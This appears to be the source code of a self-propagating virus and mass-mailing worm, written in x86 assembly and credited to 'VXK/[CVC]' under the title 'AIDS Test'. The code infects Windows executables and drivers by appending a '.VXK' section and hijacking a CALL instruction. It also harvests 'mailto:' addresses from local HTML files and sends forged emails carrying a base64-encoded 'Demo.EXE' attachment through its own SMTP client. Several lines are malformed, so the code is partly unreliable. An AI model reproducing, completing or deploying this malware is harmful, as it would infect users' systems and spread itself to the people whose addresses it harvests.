mov word ptr [esi+1ah],"KXV" ;写入感染标志

mov pNTHeader,esi ;esi -> IMAGE_NT_HEADER
mov ebx,edi

cmp eax,1
jnz Nt_krnl_set
jmp common_set
Nt_krnl_set:

Common_set:
mov pNewSection,ebx ; edi -> new Section
xor ebx,ebx
call SimpleEPO

push FILE_BEGIN
push 0
push [edi].PointerToRawData
push hfile
mov eax,dtss
call dword ptr [eax+_SetFilePointer]

;****************************************************************
;设置文件指针到结尾后,写入从VStart开始的代码,大小经过文件对齐
;****************************************************************
push 0
lea eax,[ebp+ByteWrite]
push eax
push [edi].SizeOfRawData
mov eax,dtss
push [eax+offset VStart]
push hfile
call dword ptr [eax+_WriteFile]

IF_F1:
push pMapping
mov eax,dtss
call dword ptr [eax+_UnmapViewOfFile]
IF_F2:
push hMapping
mov eax,dtss
call dword ptr [eax+_CloseHandle]
IF_F3:
push hfile
mov eax,dtss
call dword ptr [eax+_CloseHandle]
IF_Exit:
popad
add esp,1ch
ret 04h
;---------------------------------StartEPO------------------------------
;入口参数: pNewSection : 新添加节(病毒节)的指针
; pNTHeader : 文件IMAGE_NT_HEADER的指针
; pMapping : 文件指针
;拷贝JMP DWORD PTR [YYYYYYYY]中的YY…到Ret2ApiCall.
;--------------------------------------------------------------------------
SimpleEPO:
pushad
mov edx , [pNTHeader]
add edx , sizeof IMAGE_NT_HEADERS
assume edx : ptr IMAGE_SECTION_HEADER
mov ecx , [edx].SizeOfRawData
mov edi , [edx].PointerToRawData
add edi , [pMapping] ;Now edi = .text 的在文件中的偏移

@SearchE8:
mov al , 0e8h
repne scasb ;search for call xxxxxxxx
mov esi , edi ;edi - > xxxxxxxx 而不是 e8 xx xx xx xx.
lodsd ;search call relative
add esi , eax ;esi - > JMP DWORD PTR [YYYYYYYY]
lodsw
cmp ax , 025ffh ;esi - > YYYYYYYY
jnz @SearchE8
inc ebx ;纪录是第几个Jmp/call
cmp ebx,20h ;如果是第32个,那么开始工作....避免感染Ntoskrnl时,系统初始化失败...
jnz @SearchE8

PatchCALLandCopyJMP:
mov eax , [edx].VirtualAddress ;.text VirtualAddress
add eax , edi
sub eax , [pMapping]
sub eax , [edx].PointerToRawData ;eax contains VA of CALL XXXXXXXX
add eax , 4 ;sizeof(CALL xxxxxxxx) – sizeof(0E8h)
mov edx , pNewSection
mov edx , [edx].VirtualAddress
xchg eax , edx
sub eax , edx ;get new XXXXXXXX
stosd
push eax
mov eax,dtss
mov edi , [eax+offset Ret2ApiCall] ;write YYYYYYYY
pop eax
lodsd
stosd
popad
ret
Ring3InfectFile Endp

;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 将文件名转换为大写格式 参数:文件名(use under win9x)
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
SwitchUpCase proc uses esi edi _lpszFile
push esi
mov ebx,esi
call [ebx+_lstrlen],_lpszFile
xchg eax,ecx
mov esi,_lpszFile
mov edi,esi
xor eax,eax
cld
Switch:
lodsb
cmp al,'a'
jb NoChange
cmp al,'z'
ja NoChange
sub al,20h
stosb
NoChange:
mov edi,esi
loop Switch
pop esi
ret
SwitchUpCase endp
;
; Gets e-mail from files if avaliable.
;
scanfile:
pushad
call get_my_delta
get_my_delta:
pop ebp
lea ebp,[ebp-offset get_my_delta]
mov byte ptr [ebp+mailFlag],0

push edx
; three steps into micro$hit
push 00000000h ; example of confusing API:
push 00000080h
push 00000003h
push 00000000h
push 00000001h
push 80000000h
push edi ; 1st step:
call dword ptr [ebp+_CreateFile] ; open file for the mapping
cmp eax,-1 ; read shared
pop edx
je scanFileError

mov dword ptr [ebp+fHnd],eax ; save file handle

push edx
push 0h
push eax
call dword ptr [ebp+_GetFileSize] ; needed to know the
cmp eax,-1 ; high limit
pop edx
je scanFileErrorClose

cmp eax,100h ; erm... file too much
jb scanFileErrorClose ; small

mov ebx,eax
sub ebx,[ebp+mailtoSize] ; sub mailto size
; for better search
push ebx edx
pop ebx edx

push edx ebx
push 00000000h
push 00000000h
push 00000000h
push 00000002h
push 00000000h
push dword ptr [ebp+fHnd] ; 2nd step:
call dword ptr [ebp+_CreateFileMapping] ; create a mapping file
pop ebx edx
cmp eax,0 ; for read-only
je scanFileErrorClose

mov dword ptr [ebp+mfHnd],eax ; save mapped file handle

push edx ebx
push 00000000h
push 00000000h
push 00000000h
push 00000004h
push eax ; 3rd step:
call dword ptr [ebp+_MapViewOfFile] ; create map view (for read)
cmp eax,0
pop ebx edx
je scanFileErrorCloseMap

mov edi,eax ; store adress into edi
add edx,edi
mov ecx,[ebp+mailtoSize]
lea esi,[ebp+mailto] ; get mailto string addr

cld
scanFileLoop: ; here comes the 'search
push ecx ; algo'
push esi
push edi

rep cmpsb
pop edi
pop esi
pop ecx

je scanFileFound
inc edi
cmp edi,edx
jae scanFileNotFound
jmp scanFileLoop

scanFileNotFound:
push eax
call dword ptr [ebp+_UnmapViewOfFile] ; delete map view

scanFileErrorCloseMap:
push dword ptr [ebp+mfHnd] ; close the mapped file
call dword ptr [ebp+_CloseHandle]

scanFileErrorClose:
push dword ptr [ebp+fHnd] ; close the file
call dword ptr [ebp+_CloseHandle]

scanFileError:
popad
stc
ret

scanFileFound:
mov esi,edi ; now comes 'get e-mail'
add esi,[ebp+mailtoSize] ; algo
mov edi,ebx
cld
nextChar:
cmp edx,esi
jbe scanFileNotFound

cmp byte ptr [esi],' '
je skipChar
cmp byte ptr [esi],'"'
je endChar
cmp byte ptr [esi],''''
je endChar
cmp byte ptr [esi],'@'
jne notFoundSep
mov byte ptr [ebp+mailFlag],1
notFoundSep:
movsb
jmp nextChar
skipChar:
inc esi
jmp nextChar
endChar:
mov byte ptr [edi],0

push eax
call dword ptr [ebp+_UnmapViewOfFile] ; delete map view

push dword ptr [ebp+mfHnd] ; close the mapped file
call dword ptr [ebp+_CloseHandle]

push dword ptr [ebp+fHnd] ; close the file
call dword ptr [ebp+_CloseHandle]
; sometimes is better to
; alloc mem and do it in
; a more classic way...
cmp byte ptr [ebp+mailFlag],1
jne wrongMailAddress
popad
clc
ret
wrongMailAddress:
popad
stc
ret
lpApiAddrs label near
dd offset sGetModuleHandle
dd offset sGetTickCount
dd offset sExitProcess
dd offset sSleep
dd offset sCreateFile
dd offset sWriteFile
ddoffset sReadFile
dd offset sCloseHandle
ddoffset sFindFirstFile
ddoffset sFindNextFirst
ddoffset sFindClose
ddoffset slstrcpy
dd offset slstrlen
ddoffset slstrcat
dd offset slstrstr
ddoffset slread
ddoffset sGetFileSize
ddoffset sUnmapViewOfFile
ddoffset sCreateFileMapping
ddoffset sMapViewOfFile
ddoffset sVirtualAlloc
ddoffset sExitThread
ddoffset sCreateThread
ddoffset sTerminateThread
ddoffset sGetDateformatA
ddoffset sSetFilePointer
dd 0

sGetModuleHandle db "GetModuleHandleA",0
sGetTickCount db "GetTickCount",0
sExitProcess db "ExitProcess",0
sSleep db "Sleep",0
sCreateFile db "CreateFileA",0
sWriteFile db "WriteFileA",0
sReadFiledb "ReadFileA",0
sCloseHandledb "CloseHandle",0
sFindFirstFiledb "FindFirstFileA",0
sFindNextFiledb "FindNextFileA",0
sFindClosedb "FindClose",0
slstrcpydb "lstrcpy",0
slstrlendb "lstrlen",0
slstrcatdb "lstrcat",0
slstrstrdb "lstrstr",0
slreaddb "lread",0
sGetFileSizedb "GetFileSize",0
sUnmapViewOfFiledb "UnmapViewOfFile",0
sCreateFileMapping db "CreateFileMappingA",0
sMapViewOfFiledb "MapViewOfFile",0
sVirtualAllocdb "VirtualAlloc",0
sExitThreaddb "ExitThread",0
sCreateThreaddb "CreateThread",0
sTerminateThreaddb "TerminateThread",0
sGetDateformatAdb "GetDateformatA",0
sSetFilePointerdb "SetFilePointer",0
_GetModuleHandle dd 0
_GetTickCount dd 0
_ExitProcess dd 0
_Sleep dd 0
_CreateFiledd 0
_WriteFiledd 0
_ReadFiledd 0
_CloseHandledd 0
_FindFirstFiledd 0
_FindNextFiledd 0
_FindClosedd 0
_lstrcpydd 0
_lstrlendd 0
_lstrcatdd 0
_lstrstrdd 0
_lreaddd 0
_GetFileSize dd 0
_UnmapViewOfFiledd 0
_CreateFileMappingdd 0
_MapViewOfFiledd 0
_VirtualAllocdd 0
_ExitThreaddd 0
_CreateThreaddd 0
_TerminateThreaddd 0
_GetDateformatAdd 0
_SetFilePointerdd 0
;Socket_apiz
ipApiaddrsa label near
dd offset sWSAStartUp
dd offset sWSACleanUp
dd offset sSend
dd offset shtons
dd offset sGetHostByName
dd offset sConnect
dd offset sSocket
dd offset sCloseSocket
dd offset sRecv
dd offset sSendto
dd offset shtons
dd offset sinet_addr
dd offset sWSAGetLastError
dd offset sinet_ntoa
dd offset sgethostname
dd offset sbind
dd offset slisten
dd offset saccept
ddoffset sRecvFrom
ddoffset sgethostname
dd 0

sWSAStartUp db"WSAStartUp", 0
sWSACleanUp db"WSACleanUp", 0
sSend db"Send", 0
shtons db"htons", 0
sGetHostByName db"GetHostByName", 0
sConnect db"Connect", 0
sSocket db"Socket", 0
sCloseSocket db"CloseSocket", 0
sRecv db"Recv", 0
sSendto db"Sendto", 0
shtons db"htons", 0
sinet_addr db"inet_addr", 0
sWSAGetLastError db"WSAGetLastError", 0
sinet_ntoa db"inet_ntoa", 0
sgethostname db"gethostname", 0
sbind db"bind", 0
slisten db"listen", 0
saccept db"accept", 0
sRecvFrom db "RecvFrom",0
sgethostname sb "gethostname",0
_WSAStartUp dd 0
_WSACleanUp dd 0
_Send dd 0
_htons dd 0
_GetHostByName dd 0
_Connect dd 0
_Socket dd 0
_CloseSocket dd 0
_Recv dd 0
_Sendto dd 0
_htons dd 0
_inet_addr dd 0
_WSAGetLastError dd 0
_inet_ntoa dd 0
_gethostname dd 0
_bind dd 0
_listen dd 0
_accept dd 0
_RecvFrom dd 0
_gethostname dd 0

Ring3Callz:
_MessageBoxA dd 0
_GetProcAddressA dd 0
_LoadLibraryA dd 0
MySearchApiz:
push esi
lea eax,[esi+Kernel32]
mov ebp,[eax]
mov eax,[ebp+3ch]
mov edx,[ebp+eax+78h]
add edx,ebp
mov ecx,[edx+18h]
mov ebx,[edx+20h]
add ebx,ebp
RSearch:
dec ecx
mov esi,[ebx+ecx*4]
add esi,ebp
mov eax,50746547h
cmp [esi],eax
jne RSearch
mov eax,41636f72h
cmp [esi+4],eax
jne RSearch
mov ebx,[edx+24h]
add ebx,ebp
mov cx,[ebx+ecx*2]
mov ebx,[edx+1ch]
add ebx,ebp
mov eax,[ebx+ecx*4]
add eax,ebp
pop esi
ret
Ring3Data:
Kernel32 dd 0
user32 dd 0
sock dd 0
r3dta dd 0
n_user32 db "user32.dll",0
n_sock db "ws2_32.dll",0
Ring3CodeLen = $ - offset Ring3Code
VerSion_table:
db "CopyRight(R) VXK/[CVC].GB"
db "Kernel Model Virus::AIDS Test"
db "User Model Virus And Worm:AIDS Test"
db "What IT Will Do>?",0
Ver_len = $ - offset VerSion_table
vadata :
; client stuff --------------------------------------------------------------
wsadata WSADATA <0> ; for wsocks install check
sockaddr SOCKADDR <0> ; for connection
sizeOfSockaddr equ SIZE SOCKADDR
fd dd 0 ; handle for the socket
response dd 0 ; for server response
responseb db 0 ; for server response

myHostSize equ 160 ; for HELO
heloCmd db 'helo '
myHost db "smtp.whois.ru",0
heloSize dd 0

server db 160 dup(0) ; name of the server
; the client session
cmd0 db 'mail from:' ; MAIL
cmdFrom db 160 dup(0)
sizeCmd0 equ offset $-offset cmd0
cmd1 db 'rcpt to:' ; RCPT
cmdTo db 160 dup(0)
sizeCmd1 equ offset $-offset cmd1
cmd2 db 'data',0dh,0ah ; DATA
sizeCmd2 equ offset $-offset cmd2
cmd4 db 'quit',0dh,0ah ; QUIT
sizeCmd4 equ offset $-offset cmd4

cmd dd cmd0,sizeCmd0,cmd1,sizeCmd1,cmd2,sizeCmd2
dd 0,0,cmd4,sizeCmd4 ; hehe. void **
nCmd dd 5
; ---------------------------------------------------------------------------

; find html files stuff -----------------------------------------------------
tempPath db 260 dup(0) ; to store paths
tempPaths equ 260 ; max size
find_data WIN32_FIND_DATA ; for finf and findn
searchPath db 260 dup(0) ; to store TEMP path
fmask db '*.ht*',0 ; mask to find html files

ffHnd dd 0 ; for findf and findn
; --------------------------------------------------------------------------

; search mail stuff --------------------------------------------------------
mailto db 'mailto:' ; string to found
mailtoSize equ offset $-offset mailto
mailFlag db 0 ; the mail is correct?
mail0 db 128 dup (0) ; to store e-mail
mail1 db 128 dup (0) ; to store e-mail
mail2 db 128 dup (0) ; to store e-mail
mail3 db 128 dup (0) ; to store e-mail
mail4 db 128 dup (0) ; to store e-mail
mail5 db 128 dup (0) ; to store e-mail
mail6 db 128 dup (0) ; to store e-mail
mail7 db 128 dup (0) ; to store e-mail
mail8 db 128 dup (0) ; to store e-mail
mail9 db 128 dup (0) ; to store e-mail
mailxRef dd offset mail0,offset mail1,offset mail2
dd offset mail3,offset mail4,offset mail5
dd offset mail6,offset mail7,offset mail8
dd offset mail9
endMailxRef equ 9*4
mailCount dd 0
; --------------------------------------------------------------------------

; shared data --------------------------------------------------------------
fHnd dd 0 ; file handle
mfHnd dd 0 ; mapped file handle
flag db 0 ; guess...
commandLine dd 0 ; mmm
smHnd dd 0 ; memory handle
mapOVHnd dd 0 ; i can't remeber ;)
fileSize dd 0 ; hohoho
; --------------------------------------------------------------------------

; registry stuff -----------------------------------------------------------
HKEY_LOCAL_MACHINE equ 80000001h
regPath db 'Software/Microsoft/Windows/CurrentVersion'
db '/Explorer/Shell Folders',0
requestedvalue db 'Personal',0
PersonalP db 128 dup(0)
PersonalPs dd 128
keyHnd dd 0
; --------------------------------------------------------------------------

; This data is required to encode into Base64 -------------------------------
encTable db 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuv'
db 'wxyz0123456789+/'
; The required data to encode into Base64 ends here -------------------------

; data to genmail -----------------------------------------------------------
dateBuffs equ 32 ; the date for the mail
dateBuff db dateBuffs dup(0)
dateformat db 'MM/dd/yy',0

sdate db 6,'Date: '
sfrom db 5,'From:'
ssubject db 16,'Subject: Demo',0dh,0ah
messbody db 'MIME-Version: 1.0',0dh,0ah
db 'Message-ID: ',0dh,0ah
db 'Content-Type: multipart/mixed; boundary="a1234"',0dh,0ah
db 0dh,0ah,'--a1234',0dh,0ah
db 'Content-Type: text/plain; charset=us-ascii',0dh,0ah
db 'Content-Transfer-Encoding: 7bit',0dh,0ah,0dh,0ah
db ' This is the demo you may like.',0dh,0ah
db 0dh,0ah
db 0dh,0ah,'--a1234',0dh,0ah
db 'Content-Type: application/octet-stream; name="Demo.EXE"'
db 0dh,0ah,'Content-Transfer-Encoding: base64',0dh,0ah
db 'Content-Disposition: attachment; filename="Demo.EXE"'
db 0dh,0ah,0dh,0ah,0
messEnd db 0dh,0ah,'--a1234--',0dh,0ah,0dh,0ah,0

; some names
name0 db 5,' Jhon'
name1 db 5,' Mark'
name2 db 5,' Bill'
name3 db 6,' Frank'
name4 db 4,' Sam'
name5 db 4,' Eva'
name6 db 6,' Carla'
name7 db 5,' Joan'
name8 db 5,' Jean'
name9 db 7,' Sophie'
nameRef dd offset name0,offset name1,offset name2,offset name3
dd offset name4,offset name5,offset name6,offset name7
dd offset name8,offset name9

; some middle names
mname0 db 1,' '
mname1 db 4,' M. '
mname2 db 4,' C. '
mname3 db 4,' T. '
mname4 db 4,' R. '
mnameRef dd offset mname0,offset mname1,offset mname2,offset mname3
dd offset mname4

; some 'apellidos' ;)
sname0 db 7,'Smith <'
sname1 db 9,'Woodruf <'
sname2 db 7,'Brown <'
sname3 db 7,'Steel <'
sname4 db 8,'Driver <'
sname5 db 8,'Seldon <'
sname6 db 7,'Forge <'
sname7 db 6,'Stab <'
sname8 db 10,'McAndrew <'
sname9 db 8,'Gregor <'
snameRef dd offset sname0,offset sname1,offset sname2,offset sname3
dd offset sname4,offset sname5,offset sname6,offset sname7
dd offset sname8,offset sname9

; some 'from' servers
smail0s equ offset smail1-offset smail0-1
smail0 db smail0s,'[email protected]>',0dh,0ah

smail1s equ offset smail2-offset smail1-1
smail1 db smail1s,'[email protected]>',0dh,0ah

smail2s equ offset smail3-offset smail2-1
smail2 db smail2s,'[email protected]>',0dh,0ah

smail3s equ offset smail4-offset smail3-1
smail3 db smail3s,'[email protected]>',0dh,0ah

smail4s equ offset smailRef-offset smail4-1
smail4 db smail4s,'[email protected]>',0dh,0ah

smailRef dd offset smail0,offset smail1,offset smail2,offset smail3
dd offset smail4

commandLineOk db 260 dup(0) ; fixed command line
; ---------------------------------------------------------------------------

; Thread Stuff --------------------------------------------------------------
threadId0 dd 0 ; thead handle
thrSem db 0 ; thread is working?
; ---------------------------------------------------------------------------
;
; generates a message for the mail
;
genMessage:
push edi
push esi

push [ebp+dateBuffs]
push offset [ebp+dateBuff]
push offset [ebp+dateformat]
push 0
push 0
push 0
call dword ptr [ebp+_GetDateformatA]

cld
xor ecx,ecx
mov cl,byte ptr [ebp+sdate]
lea esi,[ebp+sdate]+1
rep movsb

lea esi,[ebp+dateBuff]
date0:
cmp byte ptr [esi],0
je date1
movsb
jmp date0

date1:
mov word ptr [edi],0a0dh
add edi,2

xor ecx,ecx
mov cl,byte ptr [ebp+sfrom]
lea esi,[ebp+sfrom]+1
rep movsb

other0:
call dword ptr [ebp+_GetTickCount]
and al,00001111b
cmp al,9
ja other0

lea esi,[ebp+nameRef]
and eax,000000ffh
xor edx,edx
mov cl,4
mul cl
add esi,eax
mov esi,dword ptr [esi]

xor ecx,ecx
mov cl,byte ptr [esi]
inc esi
rep movsb

other1:
call dword ptr [ebp+_GetTickCount]
and al,00001111b
cmp al,4
ja other1

lea esi,[ebp+mnameRef]
and eax,000000ffh
xor edx,edx
mov cl,4
mul cl
add esi,eax
mov esi,dword ptr [esi]

xor ecx,ecx
mov cl,byte ptr [esi]
inc esi
rep movsb

other2:
call dword ptr [ebp+_GetTickCount]
and al,00001111b
cmp al,9
ja other2

lea esi,[ebp+snameRef]
and eax,000000ffh
xor edx,edx
mov cl,4
mul cl
add esi,eax
mov esi,dword ptr [esi]

xor ecx,ecx
mov cl,byte ptr [esi]
inc esi
rep movsb

other3:
call [ebp+_GetTickCount]
and al,00001111b
cmp al,4
ja other3

lea esi,[ebp+smailRef]
and eax,000000ffh
xor edx,edx
mov cl,4
mul cl
add esi,eax
mov esi,dword ptr [esi]

push esi edi ; store From
lea edi,[ebp+cmdFrom]
mov byte ptr [edi],'<'
inc edi
xor ecx,ecx
mov cl,byte ptr [esi]
inc esi
push ecx
rep movsb
pop ecx
add ecx,(ebp+offset cmdFrom-offset cmd0)+1
mov dword ptr [ebp+cmd+4],ecx
pop edi esi

xor ecx,ecx
mov cl,byte ptr [esi]
inc esi
rep movsb

xor ecx,ecx
mov cl,byte ptr [ebp+ssubject]
lea esi,[ebp+ssubject]+1
rep movsb

mov dword ptr [edi],' :oT'
add edi,4
pop esi

push esi edi ; store the server
lea edi,[ebp+server]
searchThe@:
inc esi
cmp byte ptr [esi],'@'
jne searchThe@
inc esi
storeServer:
cmp byte ptr [esi],0
je storeServerEnd
movsb
jmp storeServer
storeServerEnd:
movsb
pop edi esi

push esi edi ; store To
lea edi,[ebp+cmdTo]
mov byte ptr [edi],'<'
inc edi
xor ecx,ecx
storeTo0:
cmp byte ptr [esi],0
je storeTo1
movsb
inc ecx
jmp storeTo0
storeTo1:
add ecx,(ebp+offset cmdTo-offset cmd1)+4
mov byte ptr [edi],'>'
mov word ptr [edi+1],0a0dh
mov dword ptr [ebp+cmd+12],ecx
pop edi esi

other4:
cmp byte ptr [esi],0
je other5
movsb
jmp other4

other5:
mov word ptr [edi],0a0dh
add edi,2

lea esi,[ebp+messbody]
other6:
cmp byte ptr [esi],0
je other7
movsb
jmp other6

other7:
push esi
mov eax,dword ptr [ebp+fileSize]
xor edx,edx
mov ecx,3
div ecx
inc eax
xor edx,edx
mul ecx
mov ecx,eax
mov edx,edi
mov eax,dword ptr [ebp+mapOVHnd]
call encodeBase64
pop esi

mov edi,edx

mov word ptr [edi],0a0dh
add edi,2

lea esi,[ebp+messEnd]
endm0:
cmp byte ptr [esi],0
je endm1
movsb
jmp endm0
endm1:

mov word ptr [edi],0a0dh
add edi,2
mov byte ptr [edi],'.'
inc edi
mov word ptr [edi],0a0dh
add edi,2

pop ecx
sub edi,ecx
mov eax,edi
ret

;
; This is the SMTP client. It's nice. I think you can undertand it.
; Look at internet standards (RFC821/RFC822 if i'm right...)
;
thread:
push PCL_NONE
push SOCK_STREAM
push AF_INET
call dword ptr [ebp+_socket] ; open a socket
cmp eax,SOCKET_ERR
je exitThrQsocksC

mov dword ptr [ebp+fd],eax ; save the socket

push [ebp+myHostSize]
push offset [ebp+myHost]
call dword ptr [ebp+_gethostname] ; get host for helo
cmp eax,0
jne exitThrQsocksC

lea edi,[ebp+heloCmd]
mHeloLoop:
cmp byte ptr [edi],0
je heloDone
inc edi
jmp mHeloLoop
heloDone:
mov word ptr [edi],0a0dh
add edi,2
mov ecx,edi
sub ecx,offset [ebp+heloCmd]
mov dword ptr [ebp+heloSize],ecx
; now fill the sockaddr
; for connection
mov word ptr [ebp+sockaddr].sin_family,AF_INET

push offset [ebp+server]
call dword ptr [ebp+_gethostbyname] ; get the hostent struct
cmp eax,0
je exitThrQsocksC

mov eax,dword ptr [eax+HOSTENT_IP]
mov eax,dword ptr [eax]
mov dword ptr [ebp+sockaddr].sin_addr,eax

push [ebp+PORT]
call dword ptr [ebp+_htons] ; get port in network byte
mov word ptr [ebp+sockaddr].sin_port,ax ; order

push [ebp+sizeOfSockaddr]
push offset [ebp+sockaddr]
push dword ptr [ebp+fd]
call dword ptr [ebp+_Connect] ; connect now!
cmp ax,SOCKET_ERR
je exitThrQsocksC

mov eax,dword ptr [ebp+fd]
call SResponse ; get server response
cmp eax,SOCKET_ERR ; to connection
je exitThrQsocksC
cmp eax,' 022'
jne exitThrQsocksC

lea esi,[ebp+heloCmd]
mov ecx,dword ptr [ebp+heloSize] ; helloooo

mov eax,dword ptr [ebp+fd]
call writeSocket ; write command

mov eax,dword ptr [fd]
call SResponse ; get server response
cmp eax,SOCKET_ERR ; to helo
je exitThrQsocksC
cmp eax,' 052'
jne exitThrQsocksC

lea edi,[ebp+cmd]
mov ecx,[ebp+nCmd]

sendLoop:
push ecx

mov esi,dword ptr [edi]
mov ecx,dword ptr [edi+4]

mov eax,dword ptr [ebp+fd]
call writeSocket ; write command
pop ecx

push ecx
mov eax,dword ptr [ebp+fd]
call SResponse ; get server response
pop ecx
cmp eax,SOCKET_ERR
je exitThrQsocksC
cmp eax,' 052'
je replyOK
cmp eax,' 152'
je replyOK
cmp eax,' 453'
jne exitThrQsocksC
replyOK:
add edi,8
loop sendLoop

exitThrQsocksC:
push dword ptr [ebp+fd]
call [ebp+_closesocket]

exitThrQsocks:

exitThr:
dec byte ptr [ebp+thrSem]

push 0h ; exit Thr
call dword ptr [ebp+_ExitThread]


;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;
; IN
; esi: pointer to buffer
; ecx: bytes to write
; eax: socket
;
; OUT
; eax: startus
;


;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
push ecx
push esi
push eax
call dword ptr [ebp+_send]

ret

;
; IN
; eax: socket
;
; OUT
; eax: response
;
SResponse:
push eax

push 0
push 4
push offset [ebp+response]
push eax
call dword ptr [ebp+_recv]
cmp eax,4
jne errorSR

readSRLoop:
pop eax
push eax

push 0
push 1
push offset [ebp+responseb]
push eax
call dword ptr [ebp+_recv]
cmp eax,1
jne noMore
cmp byte ptr [ebp+responseb],0ah
jne readSRLoop

noMore:
pop eax
mov eax,dword ptr [ebp+response]
ret

errorSR:
pop eax
mov eax,SOCKET_ERR
ret

CoolEnd:
retn
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;
; encodeBase64 by BBT in the 13th. All rights reserved ;)
; Feel free to modify and distribute this code.
; Size of data to encode must be: (size mod 3)=0!
; I don't do padding :(
;
; in: eax address of data to encode
; edx address to put encoded data
; ecx size of data to encode
;
; out: ecx size of encoded data
;
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
encodeBase64:
xor esi,esi
lea edi,encTable
push esp
xor esp,esp
baseLoop:

xor ebx,ebx
mov bl,byte ptr [eax]
shr bl,2
and bl,00111111b
mov bh,byte ptr [edi+ebx]
mov byte ptr [edx+esi],bh
inc esi

mov bx,word ptr [eax]
xchg bl,bh
shr bx,4
mov bh,0
and bl,00111111b
mov bh,byte ptr [edi+ebx]
mov byte ptr [edx+esi],bh
inc esi

inc eax
mov bx,word ptr [eax]
xchg bl,bh
shr bx,6
mov bh,0
and bl,00111111b
mov bh,byte ptr [edi+ebx]
mov byte ptr [edx+esi],bh
inc esi

inc eax
xor ebx,ebx
mov bl,byte ptr [eax]
and bl,00111111b
mov bh,byte ptr [edi+ebx]
mov byte ptr [edx+esi],bh
inc esi
inc eax

inc esp
cmp esp,24
ja addEndOfLine
inc esp

addedEndOfLine:
sub ecx,3
cmp ecx,0
jne baseLoop

mov ecx,esi
add edx,esi
pop esp
ret

addEndOfLine:
xor esp,esp
mov word ptr [edx+esi],0a0dh
add esi,2
jmp addedEndOfLine


ret_host:
popad
db 0FFh,25h
Ret2ApiCall:
dd 0
VEND:
db "AIDS Test A Example To Infect Driver Files",0
;*****************PE Data*****************************
VImports:
dd offset Kernel32_Pointers + @
dd -1,-1
dd offset Kernel32_Name + @
VIAT:
dd offset Kernel32_Relocated + @
db 14 dup (0)
Kernel32_Pointers dd offset Kernel32_Beep + @ , 0
Kernel32_Relocated dd offset Kernel32_Beep + @ , 0
Kernel32_Beep db ?,?,'MessageBoxA',0
Kernel32_Name db 'User32.dll',0

MDosStub:
db 4Dh,5Ah,90h,00,03,00, 00, 00, 04, 00, 00,00,0FFh,0FFh,00,00
db 0B8h,00,00,00, 00, 00, 00, 00,40h, 00, 00, 00, 00, 00,00,00
db 00, 00, 00,00,00,00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
db 00, 00, 00, 00,00,00,00,00, 00, 00, 00, 00, 40h, 00, 00, 00
db 50h,45h,00,00

MFileHeader:
Machine dw 14Ch
NumberOfSections dw 1
TimeDateStamp dd 3cbe5cc2h
PointerToSymbolTable dd 0
NumberOfSymbols dd 0
SizeOfOptionalHeader dw 0e0h
Characteristics dw 10fh

MIMAGE_OPTIONAL_HEADER32:
Magic dw 10bh
MajorLinkerVersion db 5
MinorLinkerVersion db 12
SizeOfCode dd 0
SizeOfInitializedData dd 0
SizeOfUninitializedData dd 0
AddressOfEntryPoint dd 1000h
BaseOfCode dd 1000h
BaseOfData dd 3000h
ImageBase dd 400000h
SectionAlignment dd 1000h
FileAlignment dd 200h
MajorOperatingSystemVersion dw 4
MinorOperatingSystemVersion dw 0
MajorImageVersion dw 0
MinorImageVersion dw 0
MajorSubsystemVersion dw 4
MinorSubsystemVersion dw 0
Win32Versionvalue dd 0
SizeOfImage dd 3000h;need to change st
SizeOfHeaders dd 200h
CheckSum dd 0
Subsystem dw 2 ;(Windows GUI)
DllCharacteristics dw 0
SizeOfStackReserve dd 100000h
SizeOfStackCommit dd 1000h
SizeOfHeapReserve dd 100000h
SizeOfHeapCommit dd 1000h
LoaderFlags dd 0
NumberOfRvaAndSizes dd 10h
DataDirectory dd 0,0
dd offset VImports+@,VIMPORT_SIZE
dd 14h dup(0)
dd offset VIAT + @,8
dd 0,0,0,0,0,0

MIMAGE_SECTION_HEADER:
Name1 db '.VXK',0,0,0,0
VirtualSize dd offset VEnd - offset VStart
VirtualAddress dd 1000h
SizeOfRawData dd 0
PointerToRawData dd 200h
PointerToRelocations dd 0
PointerToLinenumbers dd 0
NumberOfRelocations dw 0
NumberOfLinenumbers dw 0
Characteristic dd 0E0000020h
PORT equ 25
VEnd:
V_len=$-offset VStart

End VStart

你可能感兴趣的:(病毒汇编和调试逆向技术加脱壳)